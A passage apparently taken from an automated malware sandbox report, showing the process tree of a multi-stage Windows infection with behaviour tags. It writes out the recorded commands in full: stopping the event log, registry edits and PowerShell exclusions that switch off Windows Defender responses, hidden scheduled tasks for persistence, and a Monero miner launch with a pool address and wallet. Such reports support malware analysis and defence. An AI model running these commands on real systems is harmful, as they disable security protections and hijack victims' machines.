C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:6136 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"8⤵
- Launches sc.exe
PID:5436 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4388
-
C:\Users\Admin\Pictures\vvqwA2BJ1ZI77xYXTbgy3RnB.exe"C:\Users\Admin\Pictures\vvqwA2BJ1ZI77xYXTbgy3RnB.exe"7⤵
- Executes dropped EXE
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\7zS3D33.tmp\Install.exe.\Install.exe /tEdidDDf "385118" /S8⤵
- Checks computer location settings
- Executes dropped EXE
PID:5588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵PID:5816
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵PID:4388
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵PID:2768
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:6032
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵PID:5952
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵PID:4052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:620
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵PID:2224
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵PID:5164
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵PID:5332
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵PID:5844
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵PID:4052
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵PID:4412
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:1112
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵PID:4184
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
PID:4104 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵PID:5164
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:5716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
PID:2412 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵PID:444
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 07:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS3D33.tmp\Install.exe\" it /EvLdidZJHr 385118 /S" /V1 /F9⤵
- Creates scheduled task(s)
PID:1296 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"9⤵PID:5344
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ10⤵PID:5872
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ11⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"C:\Users\Admin\AppData\Local\Temp\1000052001\ReurgingGleek.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5176 -
C:\ProgramData\system.exe"C:\ProgramData\system.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5556 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"7⤵
- Creates scheduled task(s)
PID:1664 -
C:\ProgramData\build.exe"C:\ProgramData\build.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 14726⤵
- Program crash
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\1000014001\7b2f91b071.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\7b2f91b071.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3152
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:3552 -
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:4520 -
C:\Windows\Temp\605861.exe"C:\Windows\Temp\605861.exe" --list-devices3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3708
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:452
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4860
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:4024 -
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:1816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5176 -ip 51761⤵PID:4696
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
PID:2808 -
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:5360 -
C:\Windows\Temp\151594.exe"C:\Windows\Temp\151594.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5720
-
C:\Users\Admin\AppData\Local\Temp\7zS2B70.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS2B70.tmp\Install.exe it /DSzdidOKNS 385118 /S1⤵PID:4756
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5744
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:1340
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:3044
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5680
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5856
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2412
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:5468
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5380
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4832
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2444
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:1340
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5156
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:6004
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1372
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5516 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5864
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5376
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5276
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5172
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1412
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6004
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4700
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:364
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6024
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2324
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4932
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3104
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2800
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4880
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4008
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5628
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5636
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:548
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1956
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" 